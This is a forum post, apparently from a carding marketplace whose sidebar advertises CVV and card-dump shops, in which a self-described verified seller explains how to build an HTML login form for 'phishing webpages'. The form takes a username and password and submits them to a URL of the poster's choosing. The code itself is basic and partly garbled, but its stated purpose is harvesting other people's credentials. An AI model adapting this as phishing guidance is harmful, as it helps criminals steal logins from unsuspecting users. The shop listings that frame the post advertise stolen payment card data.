logo
Welcome

Join us now to get access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, and so, so much more. It's also quick and totally free, so what are you waiting for?

Luki Crown
Money Club cc shop
Patrick Stash
Wizard's shop 2.0
BidenCash Shop
Kfc Club
banner Expire 1 April  2021
Rescator cvv and dump shop
Yale lodge shop
UniCvv
Vclub
banner expire at 13 August 2024

TOXIC

TRUSTED VERIFIED SELLER
Joined
Apr 28, 2024
Messages
185
Points
16
I will guide you to create the login form in this tutorial. This will help you to create or edit phishing webpages.

In order to create form use “<form>”tag
Like this
<form>

</form> //closing tag

Add Username field as Text field using “<input>” tag:

<input type=’text’ name=’username’ /> //name is your desired name


add Password field as Password field using “<input>” tag:

<input type=’password’ name=’pswrd’/> //name is your desired name

For button use this tag:

<input type=’submit’ value=’login’ name=’login’ />

Finally it look like this:

<form>

<input type=’text’ name=’username’/>

<input type=’password’ name=’paswrd’/>

&lgt;input type=’submit’ value=’login’ name=’login’/>

</form>

but we still didn’t finish the real process

we need to add action attribute in the form tag as shown below:

<form action=’url to call’>

<input type=’text’ name=’username’/>

<input type=’password’ name=’paswrd’/>

&lgt;input type=’submit’ value=’login’ name=’login’/>

</form>

instead of “url to call” ,you add your url .
 
Top